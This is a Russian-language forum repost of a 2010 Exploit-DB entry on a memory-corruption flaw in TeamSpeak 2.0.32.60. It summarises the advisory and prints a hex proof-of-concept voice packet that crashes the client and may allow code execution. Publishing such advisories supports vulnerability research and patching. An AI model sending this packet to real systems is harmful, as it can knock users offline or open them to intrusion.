Exploit TeamSpeak 2.0.32.60 - Memory Corruption

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34938
Проверка EDB
  1. Пройдено
Автор
JOKAIM & NSENSE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-10-28
TeamSpeak 2.0.32.60 - Memory Corruption
Код:
source: https://www.securityfocus.com/bid/44502/info

Teamspeak is prone to a memory-corruption vulnerability.

Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.

Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.

Teamspeak version 2.0.32.60 is vulnerable. 

The following proof-of-concept packet is available:
f2be000426ad7e00300000000001000a414141414141414141424141414141
4141414141414141414141414141414141414100ff99414141424242424141
414141414141414141
 
Источник
www.exploit-db.com

Похожие темы